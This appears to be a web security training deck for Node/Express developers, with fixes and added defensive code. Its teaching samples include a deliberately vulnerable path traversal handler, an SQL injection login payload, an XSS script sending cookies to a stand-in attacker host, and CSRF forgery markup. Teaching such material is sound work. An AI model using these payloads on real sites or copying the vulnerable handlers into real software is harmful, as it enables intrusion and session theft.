4. Path Traversal
• an attempt to access files that we should not be able to reach
GET http://webapplication.com/static/style.css
// Vulnerable handler from the slide (kept vulnerable on purpose): whatever
// follows /static/ is joined onto the static directory with no containment
// check, so "../" segments walk out of it.
const express = require('express');
const fs = require('fs');
const path = require('path');
const app = express();

app.get('/static/*', (req, res) => {
  // req.params[0] is the already-decoded remainder of the URL, "../" included
  const filename = path.join(process.cwd(), 'static', req.params[0]);
  if (fs.existsSync(filename)) {
    return res.end(fs.readFileSync(filename));
  }
  res.status(404).end('Not found');
});
Both of the following resolve to files outside the static directory:
GET http://webapplication.com/static/../app.js
GET http://webapplication.com/static/../index.js
5. Path Traversal
• Do not try to solve this yourself: people far better at it than you have got it wrong, more than once:
https://expressjs.com/en/advanced/security-updates.html
• It is not as simple as it looks:
• %2e%2e%2f is the same as ../
• %2e%2e/ is the same as ../
• %252e%252e%255c becomes ..\ after a second round of URL decoding (double encoding)
• The solution is to use the existing, maintained method (express.static):
app.use(express.static('files'))
6. SQL Injection
• the attack requires two things:
• data that come from an untrusted source
• an SQL query that is built dynamically from those data
Login data (expected):
username: sergej@axilis.com
password: ES6>.net
Login data (malicious):
username: sergej@axilis.com
password: " OR 1 --
Resulting query (the closing quote is swallowed by the -- comment and OR 1 makes the WHERE clause true for every row, so the first user in the table is logged in):
SELECT * FROM users
WHERE username = "sergej@axilis.com"
AND password = "" OR 1 --"
Vulnerable handler (string interpolation; `database` stands for the application's database client):
const username = req.body['username'];
const password = req.body['password'];
const q = `
  SELECT * FROM users
  WHERE username = "${username}"
  AND password = "${password}" `;
const results = database.exec(q);
if (results.length) {
  req.session['user'] = results[0];
}
7. SQL Injection
• Use prepared statements (parameter binding): the query text is fixed and the values travel separately, so they can never change the structure of the query
Before (string interpolation, vulnerable):
const username = req.body['username'];
const password = req.body['password'];
const q = `
  SELECT * FROM users
  WHERE username = "${username}"
  AND password = "${password}" `;
const results = database.exec(q);
if (results.length) {
  req.session['user'] = results[0];
}
After (parameter binding; `database.prepare(...).exec(...)` stands for the bind API of whichever client is in use):
const username = req.body['username'];
const password = req.body['password'];
const q = `
  SELECT * FROM users
  WHERE username = :username
  AND password = :password `;
const results = database.prepare(q).exec({ username, password });
if (results.length) {
  req.session['user'] = results[0];
}
10. XSS (Cross Site Scripting)
• injecting malicious code into the content of the page
Expected post:
Leverage agile frameworks to provide a robust synopsis for high level overviews. Iterative approaches to corporate strategy foster collaborative thinking to further the overall value proposition.
Malicious post (sends every visitor's cookies to the attacker's server):
<script>
window.location = "http://evilpage.com/" + document.cookie;
</script>
Model (stores the post body unchanged):
Post.create({
  content: req.body.content,
  user: req.session.user.id
});
View (EJS; the unescaped <%- %> tag writes the stored content into the page as raw HTML):
<div class="user-content">
  <%- post.content %>
</div>
11. XSS
• EJS
• the normal <%= object %> tags escape HTML
• the special <%- object %> tags explicitly do not escape
• an attack is still possible in some situations even with escaping (e.g. rendering into a JavaScript block or an attribute, where HTML escaping is the wrong encoding)
• real prevention is escaping the data for the context it is rendered in, together with validating the input
• cookies can be set HttpOnly, so an injected script cannot read them (it can still act as the user from inside the page)
http://scottksmith.com/blog/2015/06/22/secure-node-apps-against-owasp-top-10-cross-site-scripting/
http://www.managerjs.com/blog/2015/05/will-ejs-escape-save-me-from-xss-sorta/
Quoted from the React documentation: "React is safe. We are not generating HTML strings so XSS protection is the default."
13. XSS #2
• Content Security Policy (CSP): a response header that tells the browser where it may load JavaScript and CSS from. A policy that still allows 'unsafe-inline' does nothing against a script injected whole into the page; only a strict policy (a nonce or hash for every legitimate inline script) blocks those, and even then CSP is a mitigation layered on top of escaping, not a substitute for it
• If the user may enter arbitrary text (a form field) that has to be rendered, what remains is sanitising the content: express-sanitizer
http://scottksmith.com/blog/2015/06/22/secure-node-apps-against-owasp-top-10-cross-site-scripting/
req.sanitize(item).escape();
14. Session prediction
• a relatively simple principle: work out how session ids are assigned
• if we guess the session id of a particular user, we are automatically logged in as that user
• the same holds for JWTs (a token whose signing secret is weak or guessable can be forged just as easily)
• ids must be generated from a cryptographically secure random source; timestamps, counters and database ids are not random (a MongoDB ObjectId, see the link, is a timestamp plus machine, process and counter fields, all of them guessable)
http://techidiocy.com/_id-objectid-in-mongodb/
15. CSRF - Cross-Site Request Forgery
• sending a request on the user's behalf without the user's knowledge (the browser attaches the user's cookies to it automatically)
• using POST instead of GET does not solve the problem
API endpoint (GET):
GET http://bankingapp.com/transfer?to=1908&amount=100
Forged request: any page the victim visits can embed
<img src="http://bankingapp.com/transfer?to=1908&amount=100" />
API endpoint (POST):
POST http://bankingapp.com/transfer
Forged request: a form on the attacker's page (auto-submitted by script, or behind a tempting button)
<form method="POST" action="http://bankingapp.com/transfer">
  <input type="text" name="amount" value="10000" hidden />
  <input type="submit" value="Learn JS!" />
</form>
16. CSRF
• a multi-step transaction flow does not help if the flow is predictable
• the Referer header can be checked (reliable only on HTTPS, since browsers strip it on HTTPS-to-HTTP requests; the Origin header, which browsers add to cross-origin POSTs, is the better signal)
• use a nonce (CSRF token) bound to the session and submitted together with the data
• in addition, CORS can help, but only for requests made from JavaScript in browsers (a plain HTML form submission is never subject to CORS)
http://stackoverflow.com/questions/19793695/does-a-proper-cors-setup-prevent-xsrf
17. MITM – Man in the middle
(illustration: https://www.incapsula.com/images/illustrations/web-app-security-mini-site/man-in-the-middle-mitm.jpg)
18. MITM
• differs from sniffing in that the attacker can actively modify the data in transit
• as with sniffing, the data the user exchanges are compromised
19. MITM
• using HTTPS prevents this to a degree
• it prevents reading the data off the network (sniffing)
• it does not prevent MITM entirely, but the client will be warned that the TLS certificate is not the one it expects
• since the redirect from HTTP to HTTPS can itself be intercepted, enable HSTS (HTTP Strict Transport Security); the client then upgrades HTTP requests to HTTPS by itself (the very first visit is still unprotected unless the domain is on the browsers' preload list)
• cookies can be given the Secure flag, so they are never sent over plain HTTP
• cookies can be restricted to part of the domain (Domain and Path attributes)
20. Brute force attack
• trying all possible combinations
• on the web it shows up in two forms
• a brute force attack against the site (trying to guess data, typically credentials)
• cracking a stolen password database (after the attacker has obtained it through some other exploit)
21. Brute force attack against web pages
• relatively easy to handle by limiting the number of requests to particular pages (per client, per account, or both)
• the target is not necessarily login data
• it can also be an attempt to download normally unreachable resources that are served without an authorisation check (audio, video and other content) by guessing their identifiers
• for Express there is a simple library with support for many backing stores: express-brute
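Added example, not code from the deck and not express-brute itself: a fixed-window attempt limiter of the kind express-brute provides, keyed by client address and target account so that one address cannot hammer many accounts and many addresses cannot hammer one. The clock is injected to keep the behaviour deterministic; the limits are assumptions.

```javascript
// Added example, not code from the deck: a login attempt limiter.
class AttemptLimiter {
  constructor({ maxAttempts = 5, windowMs = 15 * 60 * 1000, now = Date.now } = {}) {
    this.maxAttempts = maxAttempts;
    this.windowMs = windowMs;
    this.now = now;
    this.buckets = new Map(); // key -> { count, windowStart }; a real deployment uses a shared store
  }

  key(ip, account) {
    return `${ip}|${String(account || '').toLowerCase()}`;
  }

  // Returns { allowed, retryAfterMs } and counts the attempt when allowed.
  check(ip, account) {
    const k = this.key(ip, account);
    const t = this.now();
    let b = this.buckets.get(k);
    if (!b || t - b.windowStart >= this.windowMs) {
      b = { count: 0, windowStart: t };
      this.buckets.set(k, b);
    }
    if (b.count >= this.maxAttempts) {
      return { allowed: false, retryAfterMs: b.windowStart + this.windowMs - t };
    }
    b.count += 1;
    return { allowed: true, retryAfterMs: 0 };
  }

  // Call after a successful login so a legitimate user is not locked out later.
  reset(ip, account) {
    this.buckets.delete(this.key(ip, account));
  }
}

// Express-style middleware: reject with 429 before the database is touched
// (and before the expensive password hash is computed).
function loginGuard(limiter) {
  return (req, res, next) => {
    const r = limiter.check(req.ip, req.body && req.body.username);
    if (!r.allowed) {
      res.setHeader('Retry-After', Math.ceil(r.retryAfterMs / 1000));
      return res.status(429).end('Too many attempts');
    }
    next();
  };
}
```

The same guard, keyed on the resource identifier instead of the account, covers the second case on the slide (guessing ids of unprotected media). The in-memory Map is only for the example: behind several application instances the counts have to live in a shared store, which is exactly why express-brute ships adapters for them.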
22. Password cracking
• at this point the passwords have already been stolen; the goal is to minimise the damage in advance
• the assumption is that users are not allowed overly simple passwords
• recommended hashing functions: Argon2, PBKDF2, scrypt, bcrypt
• all of them take a "work factor" parameter that makes every guess expensive, so cracking the users' passwords takes far longer (each password also gets its own random salt, so identical passwords do not share a hash)
• depending on the purpose of the application, consider implementing two-factor authentication
https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
23. DoS – Denial of Service
• the goal of the attack is to disrupt the normal operation of the infrastructure
• the most typical attacks are DDoS (Distributed DoS), in which thousands of different clients attack at the same time in order to exhaust all available resources
• Cash Overflow
• a specific variant aimed at abusing a service so as to run up costs, to the point of bankruptcy or of hitting the limit at which the hosting provider takes the site down
• attacks on the APIs you use (e.g. a weather API, a video-encoding API): exploiting the application so that it burns through paid third-party services
https://www.owasp.org/index.php/Denial_of_Service
24. DoS – Denial of Service
• in its most general form, with millions of requests per second, there is not much the application itself can do
• what can be done is to avoid situations in which user input has a large effect on the workload needed to generate the response:
• set an upper limit on the number of results returned
• do the same wherever user input drives the amount of work (arguments of for loops)
• limit access to services that perform expensive operations (image resizing, zipping files, fetching data from other APIs)
• limit access to services that create data (a cache service whose entire disk space can be filled by requests with varying arguments)
• limit access to the parts that call third-party APIs
26. Data validation
• home-grown validation methods, or ones copy-pasted from Stack Overflow, often lead to bad or wrong checks
/[-+]?([0-9])*.?([0-9]*)/.test("<script>bok2</script>")    => true
/[-+]?([0-9])+.?([0-9]*)/.test("<script>bok2</script>")    => true
/^[-+]?([0-9])+.?([0-9]*)$/.test("<script>bok2</script>")  => false
(the first two are unanchored, so matching any substring is enough: the empty string for the first, the lone digit 2 for the second; only the anchored version rejects the input, and even that one still has an unescaped . that matches any character)
https://www.owasp.org/index.php/Overly_Permissive_Regular_Expression
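Added example, not code from the deck: the three patterns from the slide beside a fully correct one, applied to constructed inputs. What it adds to the slide is the second defect: anchoring fixes the "matches anywhere" problem, but the unescaped '.' in the anchored pattern still accepts "1x5" as a number, and a regex alone says nothing about whether the value is actually usable as one.

```javascript
// Added example, not code from the deck: overly permissive regexes vs a strict validator.
const PATTERNS = {
  unanchoredStar: /[-+]?([0-9])*.?([0-9]*)/,      // slide, line 1: everything optional
  unanchoredPlus: /[-+]?([0-9])+.?([0-9]*)/,      // slide, line 2: needs a digit somewhere
  anchoredUnescapedDot: /^[-+]?([0-9])+.?([0-9]*)$/, // slide, line 3: anchored, '.' unescaped
  anchoredEscapedDot: /^[-+]?[0-9]+(\.[0-9]+)?$/,  // corrected: literal decimal point
};

// Run every pattern over one input; returns { patternName: boolean }.
function checkAll(input) {
  const out = {};
  for (const [name, re] of Object.entries(PATTERNS)) out[name] = re.test(input);
  return out;
}

// Validator as it should be used: type check, shape check, then a numeric
// parse so the caller gets a number or null, never a string it has to trust.
function parseDecimal(input) {
  if (typeof input !== 'string' || !PATTERNS.anchoredEscapedDot.test(input)) return null;
  const n = Number(input);
  return Number.isFinite(n) ? n : null;
}
```

A library validator (express-validator, Joi and the like) is the practical equivalent of parseDecimal; the point of writing it out is to see that each of the three slide patterns fails for a different reason.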
28. Data deserialisation
• deserialised data can be in a valid format and still not be safe (e.g. NoSQL injection: a JSON object such as {"$gt": ""} arriving where a string was expected)
• the application logic can be abused (e.g. recursive or deeply nested references)
• the user must be authenticated before we start deserialising their data
• an attack with a large payload is possible (parse 20 MB of JSON), so limit the body size before parsing
https://www.owasp.org/index.php/Deserialization_of_untrusted_data
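Added example, not code from the deck, covering both slide 24 (user input must not drive the workload) and this slide (valid JSON is not safe JSON). It parses a request body under a byte cap and a nesting cap, validates the login fields as plain strings so that an object such as {"$gt": ""} never reaches a MongoDB-style query, and clamps a user-supplied page size. The limits and sample bodies are constructed.

```javascript
// Added example, not code from the deck: bounded parsing and type validation.
const LIMITS = { maxBytes: 16 * 1024, maxDepth: 8, maxLimit: 100 }; // assumed values

// Byte cap is checked before JSON.parse does any work; the depth walk stops
// at the first violation rather than visiting the whole structure.
function parseBoundedJson(text, limits = LIMITS) {
  if (Buffer.byteLength(text, 'utf8') > limits.maxBytes) {
    throw new Error('payload too large');
  }
  const value = JSON.parse(text);
  if (depthOf(value) > limits.maxDepth) throw new Error('payload too deeply nested');
  return value;
}

// Number of nested object/array levels; a primitive at level d contributes d.
function depthOf(v, d = 0) {
  if (v === null || typeof v !== 'object') return d;
  let max = d + 1;
  for (const child of Object.values(v)) {
    max = Math.max(max, depthOf(child, d + 1));
    if (max > 64) break; // hard stop regardless of the caller's limit
  }
  return max;
}

// Login body: both fields must be non-empty strings of bounded length. An
// object here is the classic NoSQL injection: {"username": {"$gt": ""}}
// passed straight into a query matches every user.
function validateLogin(body) {
  const errors = [];
  for (const field of ['username', 'password']) {
    const v = body && body[field];
    if (typeof v !== 'string' || v.length === 0 || v.length > 256) {
      errors.push(`${field} must be a string of 1-256 characters`);
    }
  }
  return errors.length
    ? { ok: false, errors }
    : { ok: true, username: body.username, password: body.password };
}

// Pagination argument: the user picks the value, the server owns the bound.
function clampLimit(raw, limits = LIMITS) {
  const n = Number.parseInt(raw, 10);
  if (!Number.isInteger(n) || n < 1) return 20; // default page size
  return Math.min(n, limits.maxLimit);
}
```

With body-parser the byte cap is the `limit` option; what it cannot do is the type check, which is why the slide's "valid format but not safe" needs the schema step separately from parsing.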
30. Security of "secrets"
• never store API keys in the code
• there are simple and far safer solutions (a .env file that is kept out of version control and loaded into environment variables)
https://wptavern.com/ryan-hellyers-aws-nightmare-leaked-access-keys-result-in-a-6000-bill-overnight
“In total, there seemed to be around 600 servers running. The time between realizing all this and uploading my Git repository was approximately 12 hours.”
.env file:
export MONGO_STRING="mongodb://uri"
export NODE_ENV="production"
Terminal (set the variables):
source ./.env
31. AWS Credentials
• use IAM to issue AWS API keys
• User: credentials for a person, or an API key
• Group: a set of users
• Role: a grant of specific permissions that a service or instance assumes (no long-lived AWS key needed at all)
• grant the minimum permissions required
• the root account must be protected with two-factor authentication, and should not be used for day-to-day work
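Added example, not from the deck: what "minimum permissions required" looks like as an IAM policy document, for an application that only needs to read and write objects under one prefix of one bucket. The bucket name and prefix are hypothetical. Attached to the role an EC2 instance or Lambda function assumes, this replaces a key in the .env file entirely; contrasted with a policy whose Action and Resource are both "*", it is what limits the damage when credentials do leak.

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "ReadWriteUploadsPrefixOnly",
      "Effect": "Allow",
      "Action": ["s3:GetObject", "s3:PutObject"],
      "Resource": "arn:aws:s3:::example-app-uploads/uploads/*"
    },
    {
      "Sid": "ListThatPrefixOnly",
      "Effect": "Allow",
      "Action": "s3:ListBucket",
      "Resource": "arn:aws:s3:::example-app-uploads",
      "Condition": { "StringLike": { "s3:prefix": ["uploads/*"] } }
    }
  ]
}
```

Nothing in it allows launching instances, which is the action the linked incident turned into a bill; a leaked key carrying this policy can at worst read and overwrite uploads.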
32. Vault
• one of the services that offer secure storage and retrieval of "secrets"
• the idea is to share access only to the data that are strictly needed
• it avoids the need to send secrets "over Slack" :D
• access can be revoked
https://www.amon.cx/blog/managing-all-secrets-with-vault/
https://spring.io/blog/2016/06/24/managing-secrets-with-vault
https://www.codementor.io/slavko/how-to-install-vault-hashicorp-secure-deployment-secrets-du107xlqd
33. AWS WAF – Web Application Firewall
https://eng.goprimer.com/deploying-aws-s-web-application-firewall-on-cloudfront-with-dynamic-content-from-an-elastic-6e633ff97fd5
34. AWS WAF
• rules can be set up that block typical attack patterns such as SQL injection and XSS (these are pattern matches and can be evaded with encoding tricks, so they complement the fixes above rather than replace them)
• access to resources can be restricted based on parts of the HTTP request (cookies, headers, the first 8 kB of the body, ...)
http://docs.aws.amazon.com/waf/latest/developerguide/web-acl-string-conditions.html
Quoted from the AWS documentation: "AWS WAF is a web application firewall that lets you monitor the HTTP and HTTPS requests that are forwarded to CloudFront, and lets you control access to your content."
35. Recap
Don't trust user input.
Don't (re)invent your own security methods.
36. Recommended links
• The Basics of Web Application Security
https://martinfowler.com/articles/web-security-basics.html
• Open Web Application Security Project
https://www.owasp.org/index.php/Main_Page
• 6 Ways To Strengthen Web App Security
http://www.darkreading.com/risk-management/6-ways-to-strengthen-web-app-security/d/d-id/1106197
• Helmet – a set of Express middlewares that raise the security baseline by setting response headers (CSP, HSTS and others)
https://www.npmjs.com/package/helmet